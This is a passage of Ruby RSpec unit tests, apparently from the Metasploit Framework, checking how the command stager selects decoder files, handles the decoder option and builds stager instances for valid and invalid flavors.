context "when decoder set in the datastore" do
let(:decoder) do
File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64")
end
subject do
create_exploit({
'DefaultOptions' => {
'CMDSTAGER::DECODER' => decoder
}
})
end
it "returns datastore flavor" do
expect(subject.select_decoder).to eq(decoder)
end
context "and decoder set in the opts" do
let(:decoder_opts) do
File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64_adodb")
end
it "returns the decoder_opts" do
expect(subject.select_decoder(:decoder => decoder_opts)).to eq(decoder_opts)
end
end
end
end
describe "#opts_with_decoder" do
subject do
create_exploit
end
context "with :decoder option" do
let(:decoder) do
File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64")
end
it "returns the :decoder option" do
expect(subject.opts_with_decoder(:decoder => decoder)).to include(:decoder)
end
end
context "without decoder option" do
it ":hasn't decoder option" do
expect(subject.opts_with_decoder).not_to include(:decoder)
end
end
end
describe "#create_stager" do
subject do
create_exploit
end
context "with correct flavor" do
let(:flavor) do
:vbs
end
let(:expected_class) do
described_class::STAGERS[flavor]
end
before do
subject.flavor = flavor
end
it "creates the correct instance" do
expect(subject.create_stager.class).to eq(expected_class)
end
end
context "with incorrect flavor" do
let(:flavor) do
:incorrect_flavor
end
let(:expected_class) do
described_class::STAGERS[flavor]
end
before do
subject.flavor = flavor
end
it "raises a NoMethodError" do
expect { subject.create_stager }.to raise_error(NoMethodError)
end
end
end
end